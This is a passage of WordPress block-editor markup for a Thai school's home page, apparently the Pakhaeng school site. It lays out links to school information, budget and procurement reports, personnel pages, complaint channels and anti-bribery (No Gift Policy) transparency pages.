c.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 